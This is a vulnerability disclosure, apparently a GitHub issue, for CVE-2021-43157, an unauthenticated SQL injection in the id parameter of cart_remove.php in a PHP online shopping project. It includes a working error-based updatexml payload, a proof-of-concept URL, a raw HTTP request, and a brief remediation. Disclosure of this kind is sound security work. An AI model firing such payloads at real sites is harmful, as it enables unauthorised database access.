Headline
CVE-2021-43157: SQL Injection vulnerability via the "id" parameter in cart_remove.php · Issue #1 · projectworldsofficial/online-shopping-webvsite-in-php
Projectsworlds Online Shopping System PHP 1.0 is vulnerable to SQL injection via the id parameter in cart_remove.php.
Author
KhanhCM (@khanhchauminh)
Version: 1.0****No login is required
Example payload:
' or updatexml(1,concat(0x7e,(version())),0) – a
Proof-of-concept
http://127.0.0.1:8888/cart_remove.php?id=5%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a
HTTP request
GET /cart_remove.php?id=5%27%20or%20updatexml%281%2Cconcat%280x7e%2C%28version%28%29%29%29%2C0%29%20--%20a HTTP/1.1
Host: 127.0.0.1:8888
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1:8888/cart.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Response in Burpsuite
Source code review****cart_remove.php
Remediation
Validate input of id
parameter in cart_remove.php
.